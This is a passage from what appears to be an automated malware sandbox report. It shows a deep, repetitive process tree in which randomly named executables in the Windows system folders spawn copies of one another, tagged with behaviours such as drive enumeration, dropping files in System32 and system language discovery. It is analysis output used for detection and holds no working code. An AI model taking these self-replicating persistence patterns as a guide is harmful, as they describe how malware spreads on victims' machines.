        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        43⤵
        
        PID:14748
        
        C:\Windows\SysWOW64\yvdnDE4\bYmZ0jx.exe
        
        C:\Windows\system32\yvdnDE4\bYmZ0jx.exe
        38⤵
        
        PID:8520
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        39⤵
        
        PID:8672
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        40⤵
        
        PID:9488
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        41⤵
        Enumerates connected drives
        
        PID:10764
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        42⤵
        
        PID:14028
        
        C:\Windows\SysWOW64\yvdnDE4\bYmZ0jx.exe
        
        C:\Windows\system32\yvdnDE4\bYmZ0jx.exe
        37⤵
        Enumerates connected drives
        
        PID:8424
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        38⤵
        
        PID:8584
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        39⤵
        Enumerates connected drives
        
        PID:9388
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        40⤵
        
        PID:10632
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        41⤵
        
        PID:13636
        
        C:\Windows\SysWOW64\yvdnDE4\bYmZ0jx.exe
        
        C:\Windows\system32\yvdnDE4\bYmZ0jx.exe
        36⤵
        
        PID:8364
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        37⤵
        Enumerates connected drives
        
        PID:8508
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        38⤵
        System Location Discovery: System Language Discovery
        
        PID:9324
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        39⤵
        
        PID:10484
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        40⤵
        
        PID:13192
        
        C:\Windows\SysWOW64\yvdnDE4\bYmZ0jx.exe
        
        C:\Windows\system32\yvdnDE4\bYmZ0jx.exe
        35⤵
        Enumerates connected drives
        System Location Discovery: System Language Discovery
        
        PID:8348
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        36⤵
        
        PID:8484
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        37⤵
        
        PID:9268
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        38⤵
        System Location Discovery: System Language Discovery
        
        PID:10412
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        39⤵
        
        PID:12836
        
        C:\Windows\SysWOW64\yvdnDE4\bYmZ0jx.exe
        
        C:\Windows\system32\yvdnDE4\bYmZ0jx.exe
        34⤵
        
        PID:8252
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        35⤵
        Enumerates connected drives
        Drops file in System32 directory
        
        PID:8404
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        36⤵
        
        PID:9200
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        37⤵
        
        PID:10300
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        38⤵
        
        PID:12408
        
        C:\Windows\SysWOW64\yvdnDE4\bYmZ0jx.exe
        
        C:\Windows\system32\yvdnDE4\bYmZ0jx.exe
        33⤵
        
        PID:8196
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        34⤵
        
        PID:8328
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        35⤵
        
        PID:9124
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        36⤵
        
        PID:10192
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        37⤵
        
        PID:12052
        
        C:\Windows\SysWOW64\yvdnDE4\bYmZ0jx.exe
        
        C:\Windows\system32\yvdnDE4\bYmZ0jx.exe
        32⤵
        
        PID:8188
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        33⤵
        
        PID:8268
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        34⤵
        Enumerates connected drives
        
        PID:9072
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        35⤵
        Drops file in System32 directory
        
        PID:10052
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        36⤵
        
        PID:11764
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        37⤵
        
        PID:15716
        
        C:\Windows\SysWOW64\yvdnDE4\bYmZ0jx.exe
        
        C:\Windows\system32\yvdnDE4\bYmZ0jx.exe
        31⤵
        Enumerates connected drives
        
        PID:8132
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        32⤵
        
        PID:8212
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        33⤵
        
        PID:8960
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        34⤵
        
        PID:9932
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        35⤵
        Drops file in System32 directory
        
        PID:11436
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        36⤵
        
        PID:15380
        
        C:\Windows\SysWOW64\yvdnDE4\bYmZ0jx.exe
        
        C:\Windows\system32\yvdnDE4\bYmZ0jx.exe
        30⤵
        Enumerates connected drives
        Drops file in System32 directory
        System Location Discovery: System Language Discovery
        
        PID:8044
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        31⤵
        
        PID:7636
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        32⤵
        
        PID:8884
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        33⤵
        
        PID:9812
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        34⤵
        
        PID:2420
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        35⤵
        
        PID:15008
        
        C:\Windows\SysWOW64\yvdnDE4\bYmZ0jx.exe
        
        C:\Windows\system32\yvdnDE4\bYmZ0jx.exe
        29⤵
        
        PID:8012
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        30⤵
        
        PID:7576
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        31⤵
        
        PID:8876
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        32⤵
        
        PID:9784
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        33⤵
        
        PID:11240
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        34⤵
        
        PID:14968
        
        C:\Windows\SysWOW64\yvdnDE4\bYmZ0jx.exe
        
        C:\Windows\system32\yvdnDE4\bYmZ0jx.exe
        28⤵
        System Location Discovery: System Language Discovery
        
        PID:7936
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        29⤵
        
        PID:8076
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        30⤵
        
        PID:8736
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        31⤵
        
        PID:9600
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        32⤵
        Drops file in System32 directory
        
        PID:10996
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        33⤵
        
        PID:14528
        
        C:\Windows\SysWOW64\yvdnDE4\bYmZ0jx.exe
        
        C:\Windows\system32\yvdnDE4\bYmZ0jx.exe
        27⤵
        
        PID:7904
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        28⤵
        
        PID:8032
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        29⤵
        Drops file in System32 directory
        
        PID:8700
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        30⤵
        
        PID:9612
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        31⤵
        
        PID:10960
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        32⤵
        
        PID:14460
        
        C:\Windows\SysWOW64\yvdnDE4\bYmZ0jx.exe
        
        C:\Windows\system32\yvdnDE4\bYmZ0jx.exe
        26⤵
        
        PID:7840
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        27⤵
        
        PID:7956
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        28⤵
        
        PID:8592
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        29⤵
        
        PID:9416
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        30⤵
        
        PID:10668
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        31⤵
        
        PID:13744
        
        C:\Windows\SysWOW64\yvdnDE4\bYmZ0jx.exe
        
        C:\Windows\system32\yvdnDE4\bYmZ0jx.exe
        25⤵
        Enumerates connected drives
        
        PID:7816
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        26⤵
        
        PID:7948
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        27⤵
        
        PID:8600
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        28⤵
        
        PID:9424
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        29⤵
        
        PID:10648
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        30⤵
        
        PID:13596
        
        C:\Windows\SysWOW64\yvdnDE4\bYmZ0jx.exe
        
        C:\Windows\system32\yvdnDE4\bYmZ0jx.exe
        24⤵
        
        PID:7756
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        25⤵
        System Location Discovery: System Language Discovery
        
        PID:7892
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        26⤵
        
        PID:8500
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        27⤵
        
        PID:9308
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        28⤵
        
        PID:10456
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        29⤵
        
        PID:13032
        
        C:\Windows\SysWOW64\yvdnDE4\bYmZ0jx.exe
        
        C:\Windows\system32\yvdnDE4\bYmZ0jx.exe
        23⤵
        
        PID:7732
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        24⤵
        
        PID:7876
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        25⤵
        
        PID:8476
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        26⤵
        
        PID:9292
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        27⤵
        
        PID:10448
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        28⤵
        
        PID:13048
        
        C:\Windows\SysWOW64\yvdnDE4\bYmZ0jx.exe
        
        C:\Windows\system32\yvdnDE4\bYmZ0jx.exe
        22⤵
        
        PID:7620
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        23⤵
        System Location Discovery: System Language Discovery
        
        PID:7708
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        24⤵
        
        PID:8336
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        25⤵
        Drops file in System32 directory
        
        PID:9152
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        26⤵
        
        PID:9300
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        27⤵
        
        PID:12244
        
        C:\Windows\SysWOW64\yvdnDE4\bYmZ0jx.exe
        
        C:\Windows\system32\yvdnDE4\bYmZ0jx.exe
        21⤵
        
        PID:7588
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        22⤵
        
        PID:7680
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        23⤵
        Drops file in System32 directory
        
        PID:8296
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        24⤵
        Drops file in System32 directory
        
        PID:9088
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        25⤵
        System Location Discovery: System Language Discovery
        
        PID:10112
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        26⤵
        
        PID:11856
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        27⤵
        
        PID:15872
        
        C:\Windows\SysWOW64\yvdnDE4\bYmZ0jx.exe
        
        C:\Windows\system32\yvdnDE4\bYmZ0jx.exe
        20⤵
        
        PID:7460
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        21⤵
        
        PID:7564
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        22⤵
        
        PID:8156
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        23⤵
        
        PID:8868
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        24⤵
        
        PID:9776
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        25⤵
        
        PID:11204
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        26⤵
        
        PID:14956
        
        C:\Windows\SysWOW64\yvdnDE4\bYmZ0jx.exe
        
        C:\Windows\system32\yvdnDE4\bYmZ0jx.exe
        19⤵
        
        PID:7408
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        20⤵
        
        PID:7532
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        21⤵
        System Location Discovery: System Language Discovery
        
        PID:8116
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        22⤵
        
        PID:8756
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        23⤵
        Drops file in System32 directory
        
        PID:9648
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        24⤵
        Enumerates connected drives
        
        PID:10976
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        25⤵
        
        PID:14484
        
        C:\Windows\SysWOW64\yvdnDE4\bYmZ0jx.exe
        
        C:\Windows\system32\yvdnDE4\bYmZ0jx.exe
        18⤵
        
        PID:7304
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        19⤵
        
        PID:7364
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        20⤵
        Drops file in System32 directory
        System Location Discovery: System Language Discovery
        
        PID:7860
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        21⤵
        
        PID:8468
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        22⤵
        
        PID:9260
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        23⤵
        
        PID:10440
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        24⤵
        
        PID:13016
        
        C:\Windows\SysWOW64\yvdnDE4\bYmZ0jx.exe
        
        C:\Windows\system32\yvdnDE4\bYmZ0jx.exe
        17⤵
        Enumerates connected drives
        
        PID:7284
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        18⤵
        
        PID:7372
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        19⤵
        
        PID:7868
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        20⤵
        
        PID:8492
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        21⤵
        
        PID:9316
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        22⤵
        
        PID:10476
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        23⤵
        
        PID:13108
        
        C:\Windows\SysWOW64\yvdnDE4\bYmZ0jx.exe
        
        C:\Windows\system32\yvdnDE4\bYmZ0jx.exe
        16⤵
        
        PID:7184
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        17⤵
        
        PID:7252
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        18⤵
        Enumerates connected drives
        
        PID:7656
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        19⤵
        Enumerates connected drives
        
        PID:8244
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        20⤵
        
        PID:9012
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        21⤵
        
        PID:10044
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        22⤵
        
        PID:11756
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        23⤵
        
        PID:15708
        
        C:\Windows\SysWOW64\yvdnDE4\bYmZ0jx.exe
        
        C:\Windows\system32\yvdnDE4\bYmZ0jx.exe
        15⤵
        Enumerates connected drives
        
        PID:6672
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        16⤵
        
        PID:7204
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        17⤵
        
        PID:7580
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        18⤵
        
        PID:8176
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        19⤵
        
        PID:8856
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        20⤵
        
        PID:9764
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        21⤵
        
        PID:11196
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        22⤵
        
        PID:14928
        
        C:\Windows\SysWOW64\yvdnDE4\bYmZ0jx.exe
        
        C:\Windows\system32\yvdnDE4\bYmZ0jx.exe
        14⤵
        
        PID:7128
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        15⤵
        
        PID:6280
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        16⤵
        
        PID:7432
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        17⤵
        
        PID:7988
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        18⤵
        Enumerates connected drives
        Drops file in System32 directory
        
        PID:8680
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        19⤵
        
        PID:9524
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        20⤵
        
        PID:10852
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        21⤵
        
        PID:14280
        
        C:\Windows\SysWOW64\yvdnDE4\bYmZ0jx.exe
        
        C:\Windows\system32\yvdnDE4\bYmZ0jx.exe
        13⤵
        
        PID:7060
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        14⤵
        
        PID:7108
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        15⤵
        
        PID:7336
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        16⤵
        
        PID:7748
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        17⤵
        System Location Discovery: System Language Discovery
        
        PID:8380
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        18⤵
        
        PID:9168
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        19⤵
        
        PID:10232
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        20⤵
        
        PID:12260
        
        C:\Windows\SysWOW64\yvdnDE4\bYmZ0jx.exe
        
        C:\Windows\system32\yvdnDE4\bYmZ0jx.exe
        12⤵
        
        PID:7004
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        13⤵
        
        PID:7028
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        14⤵
        
        PID:7244
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        15⤵
        
        PID:7640
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        16⤵
        
        PID:8228
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
        C:\Windows\system32\bYmZ0jx\yvdnDE4.exe
        17⤵
        
        PID:8980
        
        C:\Windows\SysWOW64\bYmZ0jx\yvdnDE4.exe
        
